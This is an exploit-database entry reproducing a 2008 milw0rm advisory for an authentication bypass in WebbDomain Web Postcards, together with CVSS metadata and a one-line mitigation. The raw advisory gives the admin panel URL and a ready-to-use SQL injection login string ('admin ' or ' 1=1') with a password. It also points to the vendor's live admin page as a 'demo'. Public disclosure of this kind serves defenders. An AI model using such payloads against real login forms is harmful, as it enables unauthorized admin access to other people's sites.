header-logo
Suggest Exploit
vendor:
Web Postcards
by:
x0r - Road Crew
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Web Postcards
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Auth ByPass

An authentication bypass vulnerability exists in WebbDomain Web Postcards. An attacker can exploit this vulnerability to bypass authentication and gain access to the admin panel. The attacker can use the username 'admin' or '1=1' and the password 'x0r' to gain access.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

-==============================-
 Autore: x0r - Road Crew 
Cms: WebbDomain Web Postcards
Bug: Auth ByPass 
Site Of Seller: http://webbdomain.com
 -==============================- 
Exploit: http://webbdomain.com/php/postcarden/admin

Username: admin ' or ' 1=1 
Pass: x0r 

Live Demo: http://webbdomain.com/php/postcarden/admin/admin.php
 
Greetz: La Mia Bimb4...8\10\08 Ti AmO 

# milw0rm.com [2008-11-04]

Navigation

Suggest Exploit

Services By CQR